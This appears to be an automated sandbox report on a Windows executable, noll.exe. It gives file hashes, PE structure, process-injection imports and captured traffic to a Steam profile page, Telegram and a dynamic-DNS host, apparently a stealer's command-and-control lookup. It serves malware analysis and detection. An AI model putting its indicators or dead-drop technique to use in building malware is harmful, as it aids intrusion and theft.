                                                                                                                                                                                                                                                  Preview:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):6.485311356507659
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                  File name:noll.exe
                                                                                                                                                                                                                                                  File size:393'216 bytes
                                                                                                                                                                                                                                                  MD5:d78f753a16d17675fb2af71d58d479b0
                                                                                                                                                                                                                                                  SHA1:71bfc274f7c5788b67f7cfae31be255a63dcf609
                                                                                                                                                                                                                                                  SHA256:ad9c40c2644ff83e0edbc367c6e62be98c9632157433108c03379351fe7aeca5
                                                                                                                                                                                                                                                  SHA512:60f4ebe4226fae95f6f1767d6f5fff99f69a126f0c827384c51745c512f495b001051d4273ca23bc177ec2c0511ec7f9ae384e3a5e88e29ce278ac45a55a39b8
                                                                                                                                                                                                                                                  SSDEEP:6144:elqPvKpKJNJGyRlyY8aSp0Vbux0R4kF/Y/o8+:emRJNMalyjaO0Ix6BY/s
                                                                                                                                                                                                                                                  TLSH:80848D1623A030F7E2234575BA454322CBA7B8341661F75FABC405699FFA6C1EE2C71B
                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?d.]^..]^..]^..2(..E^..2(..R^..2(..b^..T&..X^..T&..M^...'..^^..]^...^..2(..M^..2(..\^..Rich]^..........................PE..L..
                                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                  Entrypoint:0x4184ae
                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                  Time Stamp:0x66F9E368 [Sun Sep 29 23:31:52 2024 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                                                                                                  Import Hash:118187c3a5a9d853faf932e2bfb655fe
                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  je 00007FD18CE44025h
                                                                                                                                                                                                                                                  jne 00007FD18CE44023h
                                                                                                                                                                                                                                                  mov eax, FEA6B0E8h
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax+000181E8h], edi
                                                                                                                                                                                                                                                  add byte ptr [ebx+eax+75h], dh
                                                                                                                                                                                                                                                  add dword ptr [eax-0173DB18h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-01725118h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-01725B18h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-01726518h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-01706918h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-01727918h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-01728318h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-01728D18h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-01707918h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-0172A118h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-0172AB18h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-0172B518h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-01704A18h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-0172C918h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-0172D318h], edi
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax-0172DD18h], edi
                                                                                                                                                                                                                                                  jmp far eax
                                                                                                                                                                                                                                                  call dword ptr [eax+0374FFFEh]
                                                                                                                                                                                                                                                  jne 00007FD18CE44023h
                                                                                                                                                                                                                                                  mov eax, FE8D13E8h
                                                                                                                                                                                                                                                  push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                  add dword ptr [eax+00000000h], edi
                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                  • [C++] VS2010 build 30319
                                                                                                                                                                                                                                                  • [ASM] VS2010 build 30319
                                                                                                                                                                                                                                                  • [ C ] VS2010 build 30319
                                                                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                  • [LNK] VS2010 build 30319
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3bb800xc8.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2700000xb0.rsrc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2710000x3340.reloc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x300000x290.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                  .text0x10000x2e2b40x2e4005e1e159009c41d9f233e2d4596ec701bFalse0.5120988175675676Matlab v4 mat-file (little endian) , numeric, rows 4387467, columns 43874806.455831500975683IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .rdata0x300000xc99e0xca000285621fb8fcec630d03a8911453d24eFalse0.6049659653465347data6.367317298528931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .data0x3d0000x23226c0x202001217b4eb11dab4db3583f64f37447efaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .rsrc0x2700000xb00x2004b7115c48fa1ed45d7fd2da2c2df5abbFalse0.279296875data4.097217764488071IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .reloc0x2710000x49b20x4a0074336b5e1e990d510dead9e0bdbdad32False0.5687816722972973data5.49190569334322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                  RT_MANIFEST0x2700580x56ASCII text, with CRLF line terminatorsEnglishUnited States1.0232558139534884
                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                  msvcrt.dllstrncpy, malloc, _wtoi64, ??_V@YAXPAX@Z, atexit, memchr, strcpy_s, strchr, strtok_s, ??_U@YAPAXI@Z, _time64, srand, rand, memmove, __CxxFrameHandler3
                                                                                                                                                                                                                                                  KERNEL32.dllGetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, HeapSize, WideCharToMultiByte, IsValidCodePage, GetOEMCP, ExitProcess, SetCriticalSectionSpinCount, FlsAlloc, HeapAlloc, GetCurrentProcess, HeapFree, VirtualFree, GetProcessHeap, WriteFile, VirtualAllocExNuma, Sleep, ReadFile, CreateFileW, lstrcatA, MultiByteToWideChar, GetTempPathW, GetLastError, lstrcmpiA, GetProcAddress, VirtualAlloc, GlobalMemoryStatusEx, ConvertDefaultLocale, lstrcmpiW, GetModuleHandleA, VirtualProtect, CloseHandle, lstrlenA, FreeLibrary, GetThreadContext, SetThreadContext, ReadProcessMemory, SetHandleCount, WriteProcessMemory, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, WaitForSingleObject, GetDriveTypeA, CreateProcessA, CreateDirectoryA, GetLogicalDriveStringsA, CreateThread, CreateFileA, GetFileSize, SetFilePointer, MapViewOfFile, UnmapViewOfFile, lstrcpynA, SystemTimeToFileTime, GetTickCount, GetLocalTime, CreateFileMappingA, GetFileInformationByHandle, lstrcpyA, GetCPInfo, HeapSetInformation, GetCommandLineA, HeapReAlloc, GetLocaleInfoW, LoadLibraryW, InterlockedExchange, SetConsoleCtrlHandler, IsProcessorFeaturePresent, GetCurrentThread, InterlockedDecrement, GetACP, GetCurrentThreadId, SetLastError, GetFileType, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, VirtualAllocEx, GetStringTypeW, InterlockedIncrement, TlsFree, RaiseException, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, TlsSetValue, TlsGetValue, TlsAlloc, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, HeapDestroy, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, RtlUnwind, HeapCreate
                                                                                                                                                                                                                                                  USER32.dllGetDesktopWindow, OpenInputDesktop, wsprintfW, IsDialogMessageW, MessageBoxA, GetWindowLongW, ReleaseDC, GetWindowContextHelpId, GetCursorPos, SetThreadDesktop, RegisterClassW, IsWindowVisible, CharToOemA
                                                                                                                                                                                                                                                  GDI32.dllCreateDCA, GetDeviceCaps
                                                                                                                                                                                                                                                  ADVAPI32.dllRegGetValueA, RegOpenKeyExA, GetUserNameA, GetCurrentHwProfileA
                                                                                                                                                                                                                                                  SHELL32.dllSHFileOperationA
                                                                                                                                                                                                                                                  ole32.dllCoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoInitializeEx
                                                                                                                                                                                                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear, VariantInit
                                                                                                                                                                                                                                                  SHLWAPI.dll
                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:33.550920963 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:33.550981045 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:33.551062107 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:33.560724974 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:33.560746908 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:34.947391987 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:34.947552919 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.000365019 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.000395060 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.000736952 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.004609108 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.006588936 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.047333956 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.748936892 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.748975039 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.748992920 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.749037981 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.749062061 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.749095917 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.749125957 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.882539034 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.882582903 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.882633924 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.882661104 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.882671118 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.882707119 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.907700062 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.907773018 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.907788992 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.907795906 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.907823086 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.907855988 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.908523083 CET49713443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.908539057 CET4434971323.55.153.106192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:36.063746929 CET49725443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:36.063782930 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:36.063853025 CET49725443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:36.064194918 CET49725443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:36.064203978 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.426369905 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.426515102 CET49725443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.443229914 CET49725443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.443258047 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.443605900 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.443813086 CET49725443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.444364071 CET49725443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.487329006 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.965585947 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.965614080 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.965655088 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.965691090 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.965723991 CET49725443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.965794086 CET49725443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.967705965 CET49725443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:37.967740059 CET44349725149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:33.407300949 CET5228253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:33.545152903 CET53522821.1.1.1192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.925756931 CET6297353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:36.062803030 CET53629731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:38.337723970 CET5654453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:38.557816029 CET53565441.1.1.1192.168.2.5
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:33.407300949 CET192.168.2.51.1.1.10xf55Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:35.925756931 CET192.168.2.51.1.1.10x65aStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:38.337723970 CET192.168.2.51.1.1.10x2603Standard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:33.545152903 CET1.1.1.1192.168.2.50xf55No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 18, 2024 11:37:36.062803030 CET1.1.1.1192.168.2.50x65aNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                  • t.me
                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.54971323.55.153.1064433636C:\Users\user\Desktop\noll.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-18 10:37:34 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-18 10:37:35 UTC1917INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:37:35 GMT
                                                                                                                                                                                                                                                  Content-Length: 35483
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=efb104f3184f4bfb97b08ad8; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2024-12-18 10:37:35 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                  2024-12-18 10:37:35 UTC10109INData Raw: 6f 72 6b 73 68 6f 70 2f 22 3e 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 22 3e 0a 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64
                                                                                                                                                                                                                                                  Data Ascii: orkshop/">Workshop</a><a class="submenuitem" href="https://steamcommunity.com/market/">Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broad
                                                                                                                                                                                                                                                  2024-12-18 10:37:35 UTC10907INData Raw: 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4c 41 4e 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6c 61 6e 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 4e 52 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 32 5f 31 30 30 33 30 30 5f 44 65 66 61 75 6c 74 41 63 74 69 6f 6e 5f 26 71 75 6f 74 3b 7d 22 0a 09 09 20 64 61 74 61 2d 75 73 65 72 69 6e 66 6f 3d 22 5b 5d 22 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 5f 63 6f 6e 66 69 67 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 20 64 61 74 61 2d 63 6f 6e 66 69 67 3d 22 7b 26 71 75 6f 74 3b 45 55
